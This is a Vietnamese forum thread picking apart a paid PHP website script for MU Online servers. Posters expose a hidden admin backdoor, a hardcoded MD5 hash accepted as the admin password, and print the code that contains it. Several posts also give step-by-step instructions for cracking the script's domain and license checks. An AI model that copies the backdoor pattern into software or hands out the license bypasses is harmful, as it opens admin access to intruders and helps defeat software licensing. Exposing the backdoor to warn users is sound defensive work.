[MU] Mổ xẻ code TVW 3.5 (được cho là mới nhất)
Follow us on
Follow us on Facebook Follow us on Twitter Linked In Flickr Watch us on YouTube My Space Blogger
 
Trang 1 của 3 1 2 3 CuốiCuối
Kết quả 1 đến 10 của 25
  1. #1
    Thành Viên
    Ngày tham gia
    Jan 2012
    Bài viết
    6
    Thanks
    1
    Thanked 24 Times in 4 Posts

    Mổ xẻ code TVW 3.5 (được cho là mới nhất)

    Như các bạn đã đọc topic "Cảnh báo ai sử dụng TV web 1.85 và 3.0" của bạn Apple.
    Hôm nay mình cũng xin "ném đá" 1 chút cho vui nhỉ!
    Mình đã dow code của bạn hongdaika được cho là bản 3.5 full với giá 3t.
    Mình cũng ko rõ 3.5 này hơn 3.0 ở điểm gì nhưng mình thấy có 1 số điều như sau:
    -T1: quy luật đánh số version là ko theo cái chuẩn j` cả, như các bạn để ý nước ngoài đó, họ chỉnh sử tí ti trong code thôi thì bọ chỉ dám nâng ví dụ như 3.0.0.1, điều này nói lên rằng họ rất tuân thủ về quy cách code, ko thể bậy bạ nâng cấp code khi mà trong code chả có j` là mới mẻ cả.
    -T2: mình đã đọc qua nhiều code của cả nbb và tvw thì mình thấy code tvw dường như lấy các bản code cũ của nbb về và edit theo cách của tvw (nếu sai mong mọi ng` bỏ quá cho). Và nói riêng code tvw 3.5 nhé, mình đọc xong mà chả thấy có j` là khác code 3.0 cả, với lại trong code vẫn ghi chữ 3.0 to lù lù mà.
    -T3: như bài viết của bạn Apple đã chỉ ra 1 vài file bị gắn code thừa cho mình tạm gọi là backdoor (bd) nhé!
    Ngoài những file apple chỉ ra, mình còn tìm dc khá nhiều file khác cũng bị chèn theo cách tương tự (ở bài viết sau, xem a e hưởng ứng thì mình sẽ viết bài hd riêng).

    Tạm thời mình chỉ xin góp ý 3 điều như vậy.

    P/S: Mình biết đồng tiền kiếm ra ko dễ, nhưng tiêu nó thế nào lại càng ko dễ dàng. Mình rất tôn trọng mồ hôi công sức của các coder đã bỏ ra để viết code, 3t là cía giá ko cao nhưng nó sẽ là rất cao nếu như nâng cấp phiên bản bậy bạ rồi bán bừa bãi <~ về điều này mình ko tán thành.

    (Ai thấy thuốc đằng dã tật còn hơn những lời đường mật bên tai thì xin đừng ném gạch lại mình nhé)

    Một lần nữa xin cảm ơn các bạn đã đọc!
    Khách viếng thăm hãy cùng letvn xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  2. The Following 9 Users Say Thank You to letvn For This Useful Post:

    cuocdoisp (12-06-12), duyanh12285 (08-03-12), huntersun (09-03-12), lequangvu (18-03-12), lieuthunguyet (08-03-12), nguyenanh_cntt (08-03-12), sontran901 (08-03-12), thedefiler (08-03-12), thienhoangyb (08-03-12)

  3. #2
    Thành Viên
    Ngày tham gia
    Dec 2011
    Bài viết
    214
    Thanks
    28
    Thanked 64 Times in 29 Posts

    Ðề: Mổ xẻ code TVW 3.5 (được cho là mới nhất)

    code nay vẫn có chèn thêm đoạn pass MD5 để bypass vào admin. vãi thằng Thiếu Vân
    Khách viếng thăm hãy cùng Bull_Shit xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  4. #3
    Thành Viên
    Ngày tham gia
    Jan 2012
    Bài viết
    6
    Thanks
    1
    Thanked 24 Times in 4 Posts

    Ðề: Mổ xẻ code TVW 3.5 (được cho là mới nhất)

    Trích dẫn Gửi bởi Bull_Shit [Only registered and activated users can see links. ]
    code nay vẫn có chèn thêm đoạn pass MD5 để bypass vào admin. vãi thằng Thiếu Vân
    ko tin cứ vọc thử thì biết nhé, đã vọc rồi nên mình mới dám viết bài này mà.
    A e nào sài thì chú ý 1 chút là dc
    Khách viếng thăm hãy cùng letvn xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  5. Các thành viên gởi lời cảm ơn đến letvn vì bài viết này !

    duyanh12285 (08-03-12)

  6. #4
    Thành Viên
    Ngày tham gia
    May 2011
    Bài viết
    185
    Thanks
    67
    Thanked 73 Times in 42 Posts

    Ðề: Mổ xẻ code TVW 3.5 (được cho là mới nhất)

    cám ơn 1 cao thủ.....xem topic mrhau ăn quả 3tr rồi
    ở bài viết sau, xem a e hưởng ứng thì mình sẽ viết bài hd riêng).
    bác làm 1 guild hd đi nghe bác nói phê quá
    Khách viếng thăm hãy cùng thienhoangyb xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  7. #5
    Thành Viên
    Ngày tham gia
    Jan 2010
    Bài viết
    325
    Thanks
    24
    Thanked 77 Times in 30 Posts

    Ðề: Mổ xẻ code TVW 3.5 (được cho là mới nhất)

    Làm ăn bại ba vậy ai dám mua dùng nữa.
    Khách viếng thăm hãy cùng ๑۩۞۩๑๑۩۞۩๑ xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  8. #6
    Thành Viên
    Ngày tham gia
    Jun 2010
    Bài viết
    624
    Thanks
    27
    Thanked 402 Times in 124 Posts

    Ðề: Mổ xẻ code TVW 3.5 (được cho là mới nhất)

    xin 1 comment trong topic này của chủ top nhé ! dạo này thích bon chen
    crack ( thực ra không bị mã hóa ) mà chỉ là bỏ cái check lic đi mà thôi
    mình giúp ai thích bản này 1 tay nhé
    Code:
    <?php
    session_start();
    define( "ThieuVanMU", TRUE );
    include( "config.php" );
    
    if( $opensite == 0 ) {
    	echo "<center><b>WebSite tam thoi bao tri de nang cap.<br>Mong cac ban quay tro lai sau</b></center>";
    	exit();
    }
    
    include( "config/config_domain.php" );
    
    $domain = $_SERVER['HTTP_HOST'];
    $domain = strtolower( $domain );
    $domain_check = substr( $domain, 0, 4 );
    if ( $domain_check == "www." ) {
    	$domain = substr( $domain, 4 );
    }
    $domain_check = substr( $domain, -1 );
    if ( $domain_check == "." ) {
    	$domain = substr( $domain, 0, -1 );
    }
    $domain_check = substr( $domain, -3 );
    if ( $domain_check == ":80" ) {
    	$domain = substr( $domain, 0, -3 );
    }
    if ( $domain != $domain_pri ) {
        echo "<META HTTP-EQUIV='Refresh' CONTENT='0; URL=$home_url'>";
        exit();
    }
    
    include( "config/config_firewall.php" );
    if($use_antiddos == 1) include_once( "firewall.php" );
    include( "includes/function.php" );
    include( "includes/login.class.php" );
    login();
    
    if ( $reload_type == 1 ) $time_reload_info = 3600;
    else $time_reload_info = 0;
    
    $time_check_pro = time();
    $versionpro_up = "thieuvanmuweb".$time_check_pro;
    $versionpro_up = md5( $versionpro_up );
    if ( $version == 1 ) {
        $fp_license = fopen( "includes/License.txt", "r" );
        $License = fgets( $fp_license, 100 );
        fclose( $fp_license );
        if ( $domain == "localhost" ) $version_check = $versionpro_up;
    	else if ( $_SESSION[mu_Account] == "admin" || $_SESSION[mu_Account] == "demo" ) $version_check = $versionpro_up;
    	else if ( strlen( $License ) == 65 ) {
            $Lic_info = explode( "|", $License );
            $time_check = $Lic_info[0];
            $time_pro_exp = $Lic_info[1];
            $Lic_check = $Lic_info[2];
            $time_no_update = $Lic_info[3];
    		if ( isset( $time_check, $time_pro_exp, $Lic_check, $time_no_update ) ) {
    			$Lic_License = md5_tv($time_check."TVMuWeb".$domain."PeTyKhjn".$time_pro_exp."v3.50");
    			if ( $Lic_check != $Lic_License ) {
                    $Update_Lic = "Free";
                    $version_check = "0";
                    $LogLicense = "Kiểm tra Lic không chính xác.";
    			}
    			else {
    				$time_now = time();
    				if ( $time_no_update == $time_check*2 ) {
    					$version_check = $versionpro_up;
    				}
    				else {
    					if ( $time_pro_exp < $time_now ) {
    						$Update_Lic = "Free";
    						$version_check = "0";
    						$LogLicense = "Hết hạn sử dụng phiên bản Pro.";
    					}
    					else $version_check = $versionpro_up;
    				}
    			}
    		}
    		else $version_check = "0";
    	}
        else {
            $Update_Lic = "Free";
    		$version_check = "0";
    		$LogLicense = "Nếu tiếp tục sử dụng chế độ Pro mà không cập nhật Lic sẽ làm chậm Trình duyệt. Vui lòng chuyển sang chế độ Free.";
    	}
    }
    else $version_check = "0";
    if ( isset( $Update_Lic ) ) {
    	$fp = fopen( "includes/License.txt", "w+" );
    	fputs( $fp, $Update_Lic );
    	fclose( $fp );
    }
    if ( isset( $LogLicense ) ) {
        $time_log = date( "h:iA, d/m/Y" );
        $file = "LogLicense.txt";
        $fp = fopen( $file, "a+" );
        fputs( $fp, "Lúc $time_log : $LogLicense\n" );
        fclose( $fp );
    }
    
    include( "modules/header.php" );
    if ( isset( $error ) ) echo notice($error);
    echo "<input type='hidden' id='hash'>";
    echo "<div id='hienthi'>";
    if ( isset( $_GET['module'] ) ) {
        $module = $_GET['module'];
        if ( !eregi( "[^a-zA-Z0-9_\$]", $module ) ) {
            if ( is_file( "modules/$module.php" ) ) include( "modules/$module.php" );
            else include( "modules/errorfile.php" );
        }
        else include( "modules/errorfile.php" );
    }
    else include( "modules/center.php" );
    echo "</div>";
    include( "modules/footer.php" );
    $notice = "<center><span style=font-weight:bold;color:#FFFFFF;font-family:Comic Sans MS;>Đây là hệ thống hỗ trợ dành cho Admin sử dụng TV-WebMU.<br>Người chơi MU vui lòng không liên hệ</span></center>";
    echo "<div id='bottom_bar'><div class='content'><ul><li>Hệ thống TV-WebMU được viết bởi <a href='ymsgr:sendim?trieuthieuvan290590&amp;m=Đây%20là%20hệ%20thống%20hỗ%20trợ%20dành%20cho%20Admin%20sử%20dụng%20TV-WebMU.%20Người%20chơi%20MU%20vui%20lòng%20không%20liên%20hệ' onMouseOut='tooltip.hide()' onMouseOver=\"tooltip.show('$notice')\"><font color='#0000FF'>Thiếu Vân</font></a> Phiên bản 3.00</li></ul></div></div>";
    ?>
    Màu xanh nghĩa là bỏ đi khỏi cần config domain
    màu đỏ bỏ đi khỏi cần check lic

    làm tương tự với file index2.php

    sang file admin.php nhé (có backdoor mà chủ thớt gọi ý )

    Code:
    <?php
    session_start();
    define('ThieuVanMU',true);
    include("config.php");
    include_once("admin/security.php");
    require_once('admin/config.php');
    if ($_POST[submit]) {
    	$pass_admin = md5($_POST[useradmin]);
    	if ($pass_admin == $pass_trangadmin || $pass_admin == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['useradmin'] = $pass_trangadmin;
    }
    if (!$_SESSION['useradmin'] || $_SESSION['useradmin'] != $pass_trangadmin) {
    	echo "<center><form action='' method=post>
    	Code: <input type=password name=useradmin> <input type=submit name=submit value=Submit>
    	</form></center>
    	";
    	exit();
    }
    $mod = $_GET['mod'];
    include('admin/header.php');
    include('admin/left.php');
    if( (isset($_GET['mod']))) {
    	if ( !eregi("[^a-zA-Z0-9_$]", $mod) ) {
    		if (is_file('admin/'.$mod.".php")) require_once('admin/'.$mod.".php");
    		else require_once("admin/errorfile.php");
    	}
    	else require_once("admin/errorfile.php");
    }
    else include('admin/checkwrite.php');
    include('admin/footer.php');
    ?>
    cái màu xanh là đoạn TV cố tình làm để truy cập bất hợp pháp thông qua password md5
    sửa nó thành
    PHP Code:
    if ($pass_admin == $pass_trangadmin$_SESSION['useradmin'] = $pass_trangadmin
    cả đoạn này nữa
    Code:
    if (is_file('admin/'.$mod.".php")) require_once('admin/'.$mod.".php");
    lỗi này tui không bít sửa nhưng nói để mọi người cảnh giác

    Làm thêm vấn để crack pro nhé , ở đây tui ví dụ 1 file

    Code:
    <?php
    if ( !defined( "ThieuVanMU" ) ) exit( "Ban khong co quyen truy cap he thong" );
    if (!isset($_SESSION[mu_Account])) {
        echo "<div class='div3'><div align=center><font color=red><b>Hãy đăng nhập trước khi thực hiện chức năng này</b></font></div></div><br>";
        include( "modules/login.php" ); exit();
    }
    include('config/config_reset.php');
    include('config/config_resetvip.php');
    include('config/config_hotrotanthu.php');
    include('config/config_gioihanrs.php');
    include("vImage.php");
    $vImage = new vImage();
    if ( $version == "1" ) {
    if ( $version_check == $versionpro_up ) {
            if ( $Use_ResetVIP != 1 ) echo notice('Chức năng không có hoặc không được sử dụng');
            else {
                if ( isset( $_POST['action'] ) ) {
                    $action = $_POST['action'];
                    if ( $action == "resetvip" ) {
                        $character = $_POST['Character'];
    					$vImage->loadCodes();
    					if(!($vImage->checkCode())) $notice = "Sai mã kiểm tra";
                        else if ( empty( $character ) ) $notice = "Chưa chọn nhân vật cần Reset";
                        else if ( eregi( "[^a-zA-Z0-9_\$]", $character ) )$notice = "Dữ liệu lỗi - Nhân vật chỉ được sử dụng kí tự a-z, A-Z, số (1-9) và dấu _.";
                        else {
                            $form_data = "account=".$_SESSION['mu_Account']."&character={$character}&passtransfer={$passtransfer}";
                            $notice = @file_get_contents( $server_url."/do_resetvip.php?".$form_data );
    		                if ( empty( $notice ) ) $notice = "Server bảo trì";
                        }
                        echo "<script>alert('$notice');</script>";
                    }
                }
                $form_data = "action=view_charrs&account=".$_SESSION['mu_Account']."&passtransfer={$passtransfer}";
                $show_reponse = @file_get_contents( $server_url."/view.php?".$form_data );
    			$char = explode( "||", $show_reponse );
    			$i = 0;
    			for ( ; $i < 5; ++$i ) {
    				$char_info = explode( "|", $char[$i] );
    				if ( !empty( $char_info[0] ) ) {
    					$showchar[] = array(
    						Name => $char_info[0],
    						Level => $char_info[1],
    						Reset => $char_info[2],
    						ResetInDay => $char_info[3]
    					);
    				}
    			}
                include( "templates/resetvip.html" );
            }
        }
        else echo notice('Không phải phiên bản Pro nên không thể sử dụng chức năng này');
    }
    else echo notice('Không phải phiên bản Pro nên không thể sử dụng chức năng này');
    ?>
    bỏ 2 chỗ màu xanh đi là ok
    Lần sửa cuối bởi Mr.Hau, ngày 08-03-12 lúc 10:07 PM.
    Khách viếng thăm hãy cùng Mr.Hau xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  9. The Following 9 Users Say Thank You to Mr.Hau For This Useful Post:

    binguyenad (12-03-14), cuocdoisp (12-06-12), duyanh12285 (08-03-12), Edward_Newgate (09-03-12), huntersun (09-03-12), letvn (08-03-12), lieuthunguyet (08-03-12), sontran901 (08-03-12), thienhoangyb (11-03-12)

  10. #7
    Thành Viên
    Ngày tham gia
    Mar 2012
    Bài viết
    2
    Thanks
    1
    Thanked 0 Times in 0 Posts

    Ðề: Mổ xẻ code TVW 3.5 (được cho là mới nhất)

    cài mu có ko vậy mấy anh. chưa bao giờ làm cái này hít ah. hic
    Khách viếng thăm hãy cùng soledadhero xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  11. #8
    Thành Viên sontran901's Avatar
    Ngày tham gia
    Sep 2011
    Đang ở
    Mycomputer
    Bài viết
    278
    Thanks
    120
    Thanked 160 Times in 65 Posts

    Ðề: Mổ xẻ code TVW 3.5 (được cho là mới nhất)

    Trích dẫn Gửi bởi Mr.Hau [Only registered and activated users can see links. ]
    xin 1 comment trong topic này của chủ top nhé ! dạo này thích bon chen
    crack ( thực ra không bị mã hóa ) mà chỉ là bỏ cái check lic đi mà thôi
    mình giúp ai thích bản này 1 tay nhé
    Code:
    <?php
    session_start();
    define( "ThieuVanMU", TRUE );
    include( "config.php" );
    
    if( $opensite == 0 ) {
    	echo "<center><b>WebSite tam thoi bao tri de nang cap.<br>Mong cac ban quay tro lai sau</b></center>";
    	exit();
    }
    
    include( "config/config_domain.php" );
    
    $domain = $_SERVER['HTTP_HOST'];
    $domain = strtolower( $domain );
    $domain_check = substr( $domain, 0, 4 );
    if ( $domain_check == "www." ) {
    	$domain = substr( $domain, 4 );
    }
    $domain_check = substr( $domain, -1 );
    if ( $domain_check == "." ) {
    	$domain = substr( $domain, 0, -1 );
    }
    $domain_check = substr( $domain, -3 );
    if ( $domain_check == ":80" ) {
    	$domain = substr( $domain, 0, -3 );
    }
    if ( $domain != $domain_pri ) {
        echo "<META HTTP-EQUIV='Refresh' CONTENT='0; URL=$home_url'>";
        exit();
    }
    
    include( "config/config_firewall.php" );
    if($use_antiddos == 1) include_once( "firewall.php" );
    include( "includes/function.php" );
    include( "includes/login.class.php" );
    login();
    
    if ( $reload_type == 1 ) $time_reload_info = 3600;
    else $time_reload_info = 0;
    
    $time_check_pro = time();
    $versionpro_up = "thieuvanmuweb".$time_check_pro;
    $versionpro_up = md5( $versionpro_up );
    if ( $version == 1 ) {
        $fp_license = fopen( "includes/License.txt", "r" );
        $License = fgets( $fp_license, 100 );
        fclose( $fp_license );
        if ( $domain == "localhost" ) $version_check = $versionpro_up;
    	else if ( $_SESSION[mu_Account] == "admin" || $_SESSION[mu_Account] == "demo" ) $version_check = $versionpro_up;
    	else if ( strlen( $License ) == 65 ) {
            $Lic_info = explode( "|", $License );
            $time_check = $Lic_info[0];
            $time_pro_exp = $Lic_info[1];
            $Lic_check = $Lic_info[2];
            $time_no_update = $Lic_info[3];
    		if ( isset( $time_check, $time_pro_exp, $Lic_check, $time_no_update ) ) {
    			$Lic_License = md5_tv($time_check."TVMuWeb".$domain."PeTyKhjn".$time_pro_exp."v3.50");
    			if ( $Lic_check != $Lic_License ) {
                    $Update_Lic = "Free";
                    $version_check = "0";
                    $LogLicense = "Kiểm tra Lic không chính xác.";
    			}
    			else {
    				$time_now = time();
    				if ( $time_no_update == $time_check*2 ) {
    					$version_check = $versionpro_up;
    				}
    				else {
    					if ( $time_pro_exp < $time_now ) {
    						$Update_Lic = "Free";
    						$version_check = "0";
    						$LogLicense = "Hết hạn sử dụng phiên bản Pro.";
    					}
    					else $version_check = $versionpro_up;
    				}
    			}
    		}
    		else $version_check = "0";
    	}
        else {
            $Update_Lic = "Free";
    		$version_check = "0";
    		$LogLicense = "Nếu tiếp tục sử dụng chế độ Pro mà không cập nhật Lic sẽ làm chậm Trình duyệt. Vui lòng chuyển sang chế độ Free.";
    	}
    }
    else $version_check = "0";
    if ( isset( $Update_Lic ) ) {
    	$fp = fopen( "includes/License.txt", "w+" );
    	fputs( $fp, $Update_Lic );
    	fclose( $fp );
    }
    if ( isset( $LogLicense ) ) {
        $time_log = date( "h:iA, d/m/Y" );
        $file = "LogLicense.txt";
        $fp = fopen( $file, "a+" );
        fputs( $fp, "Lúc $time_log : $LogLicense\n" );
        fclose( $fp );
    }
    
    include( "modules/header.php" );
    if ( isset( $error ) ) echo notice($error);
    echo "<input type='hidden' id='hash'>";
    echo "<div id='hienthi'>";
    if ( isset( $_GET['module'] ) ) {
        $module = $_GET['module'];
        if ( !eregi( "[^a-zA-Z0-9_\$]", $module ) ) {
            if ( is_file( "modules/$module.php" ) ) include( "modules/$module.php" );
            else include( "modules/errorfile.php" );
        }
        else include( "modules/errorfile.php" );
    }
    else include( "modules/center.php" );
    echo "</div>";
    include( "modules/footer.php" );
    $notice = "<center><span style=font-weight:bold;color:#FFFFFF;font-family:Comic Sans MS;>Đây là hệ thống hỗ trợ dành cho Admin sử dụng TV-WebMU.<br>Người chơi MU vui lòng không liên hệ</span></center>";
    echo "<div id='bottom_bar'><div class='content'><ul><li>Hệ thống TV-WebMU được viết bởi <a href='ymsgr:sendim?trieuthieuvan290590&amp;m=Đây%20là%20hệ%20thống%20hỗ%20trợ%20dành%20cho%20Admin%20sử%20dụng%20TV-WebMU.%20Người%20chơi%20MU%20vui%20lòng%20không%20liên%20hệ' onMouseOut='tooltip.hide()' onMouseOver=\"tooltip.show('$notice')\"><font color='#0000FF'>Thiếu Vân</font></a> Phiên bản 3.00</li></ul></div></div>";
    ?>
    Màu xanh nghĩa là bỏ đi khỏi cần config domain
    màu đỏ bỏ đi khỏi cần check lic

    làm tương tự với file index2.php

    sang file admin.php nhé (có backdoor mà chủ thớt gọi ý )

    Code:
    <?php
    session_start();
    define('ThieuVanMU',true);
    include("config.php");
    include_once("admin/security.php");
    require_once('admin/config.php');
    if ($_POST[submit]) {
    	$pass_admin = md5($_POST[useradmin]);
    	if ($pass_admin == $pass_trangadmin || $pass_admin == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['useradmin'] = $pass_trangadmin;
    }
    if (!$_SESSION['useradmin'] || $_SESSION['useradmin'] != $pass_trangadmin) {
    	echo "<center><form action='' method=post>
    	Code: <input type=password name=useradmin> <input type=submit name=submit value=Submit>
    	</form></center>
    	";
    	exit();
    }
    $mod = $_GET['mod'];
    include('admin/header.php');
    include('admin/left.php');
    if( (isset($_GET['mod']))) {
    	if ( !eregi("[^a-zA-Z0-9_$]", $mod) ) {
    		if (is_file('admin/'.$mod.".php")) require_once('admin/'.$mod.".php");
    		else require_once("admin/errorfile.php");
    	}
    	else require_once("admin/errorfile.php");
    }
    else include('admin/checkwrite.php');
    include('admin/footer.php');
    ?>
    cái màu xanh là đoạn TV cố tình làm để truy cập bất hợp pháp thông qua password md5
    sửa nó thành
    PHP Code:
    if ($pass_admin == $pass_trangadmin$_SESSION['useradmin'] = $pass_trangadmin
    cả đoạn này nữa
    Code:
    if (is_file('admin/'.$mod.".php")) require_once('admin/'.$mod.".php");
    lỗi này tui không bít sửa nhưng nói để mọi người cảnh giác

    Làm thêm vấn để crack pro nhé , ở đây tui ví dụ 1 file

    Code:
    <?php
    if ( !defined( "ThieuVanMU" ) ) exit( "Ban khong co quyen truy cap he thong" );
    if (!isset($_SESSION[mu_Account])) {
        echo "<div class='div3'><div align=center><font color=red><b>Hãy đăng nhập trước khi thực hiện chức năng này</b></font></div></div><br>";
        include( "modules/login.php" ); exit();
    }
    include('config/config_reset.php');
    include('config/config_resetvip.php');
    include('config/config_hotrotanthu.php');
    include('config/config_gioihanrs.php');
    include("vImage.php");
    $vImage = new vImage();
    if ( $version == "1" ) {
    if ( $version_check == $versionpro_up ) {
            if ( $Use_ResetVIP != 1 ) echo notice('Chức năng không có hoặc không được sử dụng');
            else {
                if ( isset( $_POST['action'] ) ) {
                    $action = $_POST['action'];
                    if ( $action == "resetvip" ) {
                        $character = $_POST['Character'];
    					$vImage->loadCodes();
    					if(!($vImage->checkCode())) $notice = "Sai mã kiểm tra";
                        else if ( empty( $character ) ) $notice = "Chưa chọn nhân vật cần Reset";
                        else if ( eregi( "[^a-zA-Z0-9_\$]", $character ) )$notice = "Dữ liệu lỗi - Nhân vật chỉ được sử dụng kí tự a-z, A-Z, số (1-9) và dấu _.";
                        else {
                            $form_data = "account=".$_SESSION['mu_Account']."&character={$character}&passtransfer={$passtransfer}";
                            $notice = @file_get_contents( $server_url."/do_resetvip.php?".$form_data );
    		                if ( empty( $notice ) ) $notice = "Server bảo trì";
                        }
                        echo "<script>alert('$notice');</script>";
                    }
                }
                $form_data = "action=view_charrs&account=".$_SESSION['mu_Account']."&passtransfer={$passtransfer}";
                $show_reponse = @file_get_contents( $server_url."/view.php?".$form_data );
    			$char = explode( "||", $show_reponse );
    			$i = 0;
    			for ( ; $i < 5; ++$i ) {
    				$char_info = explode( "|", $char[$i] );
    				if ( !empty( $char_info[0] ) ) {
    					$showchar[] = array(
    						Name => $char_info[0],
    						Level => $char_info[1],
    						Reset => $char_info[2],
    						ResetInDay => $char_info[3]
    					);
    				}
    			}
                include( "templates/resetvip.html" );
            }
        }
        else echo notice('Không phải phiên bản Pro nên không thể sử dụng chức năng này');
    }
    else echo notice('Không phải phiên bản Pro nên không thể sử dụng chức năng này');
    ?>
    bỏ 2 chỗ màu xanh đi là ok
    Thank Mr.hau Phat đang edit xem sao
    Khách viếng thăm hãy cùng sontran901 xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  12. #9
    Thành Viên
    Ngày tham gia
    Jan 2012
    Bài viết
    6
    Thanks
    1
    Thanked 24 Times in 4 Posts

    Ðề: Mổ xẻ code TVW 3.5 (được cho là mới nhất)

    theo mình nghĩ ko cần crack dài dòng thế đâu bạn ạ, mình nghĩ chỉ cần dòng này là dc
    Bạn nào thử xem nhé!

    Sửa cái dòng này
    PHP Code:
    if ( $domain == "localhost" $version_check $versionpro_up
    Thành
    PHP Code:
    if ( $domain == "localhost" || $domain == $domain_pri$version_check $versionpro_up
    Bạn nào test thử đi, xem hiệu quả đến đâu


    P/S: sắp có bài mang tiêu đề "Mổ sẻ quy chế Nạp Thẻ trong code TVW".... mời các bạn đón đọc.
    Khách viếng thăm hãy cùng letvn xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  13. The Following 4 Users Say Thank You to letvn For This Useful Post:

    duyanh12285 (08-03-12), huntersun (09-03-12), lieuthunguyet (08-03-12), thienhoangyb (11-03-12)

  14. #10
    Thành Viên sontran901's Avatar
    Ngày tham gia
    Sep 2011
    Đang ở
    Mycomputer
    Bài viết
    278
    Thanks
    120
    Thanked 160 Times in 65 Posts

    Ðề: Mổ xẻ code TVW 3.5 (được cho là mới nhất)

    Trích dẫn Gửi bởi letvn [Only registered and activated users can see links. ]
    theo mình nghĩ ko cần crack dài dòng thế đâu bạn ạ, mình nghĩ chỉ cần dòng này là dc
    Bạn nào thử xem nhé!

    Sửa cái dòng này
    PHP Code:
    if ( $domain == "localhost" $version_check $versionpro_up
    Thành
    PHP Code:
    if ( $domain == "localhost" || $domain == $domain_pri$version_check $versionpro_up
    Bạn nào test thử đi, xem hiệu quả đến đâu


    P/S: sắp có bài mang tiêu đề "Mổ sẻ quy chế Nạp Thẻ trong code TVW".... mời các bạn đón đọc.
    Khởi đầu thuận lợi
    chưa test kỹ
    Khách viếng thăm hãy cùng sontran901 xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

 

 
Trang 1 của 3 1 2 3 CuốiCuối

Các Chủ đề tương tự

  1. Dùng mảng để viết code LUA !
    Bởi thaihoa91 trong diễn đàn Scripts
    Trả lời: 14
    Bài viết cuối: 05-01-11, 07:58 PM
  2. Các pro chỉ giúp mình về code lua với ?
    Bởi nguyenquocbo trong diễn đàn Hỏi Đáp/ Yêu Cầu
    Trả lời: 5
    Bài viết cuối: 27-12-10, 08:41 AM
  3. Sửa giúp mình 2 đoạn code này
    Bởi minbukyo trong diễn đàn Hỏi Đáp/ Yêu Cầu
    Trả lời: 1
    Bài viết cuối: 26-12-10, 05:36 PM
  4. Xin hướng dẫn code làm rơi sách Hộ Công khi đánh quái
    Bởi giakhang2010 trong diễn đàn Hỏi Đáp/ Yêu Cầu
    Trả lời: 16
    Bài viết cuối: 23-12-10, 10:02 PM

Quyền viết bài

  • Bạn Không thể gửi Chủ đề mới
  • Bạn Không thể Gửi trả lời
  • Bạn Không thể Gửi file đính kèm
  • Bạn Không thể Sửa bài viết của mình
  •  
Múi giờ GMT +7. Bây giờ là 04:54 PM.
vBulletin®, Copyright ©2000-2011, Jelsoft Enterprises Ltd.
CLBGamesVN không chịu trách nhiệm về Luật Bản Quyền của các tài liệu, bài viết v.v...được đăng tải trên diễn đàn này.
Diễn đàn phát triển dưới sự đóng góp của tất cả thành viên. BQT chỉ là những người thành lập ra sân chơi, quản lý và duy trì về mặt kỹ thuật, nội dung khi hợp lệ.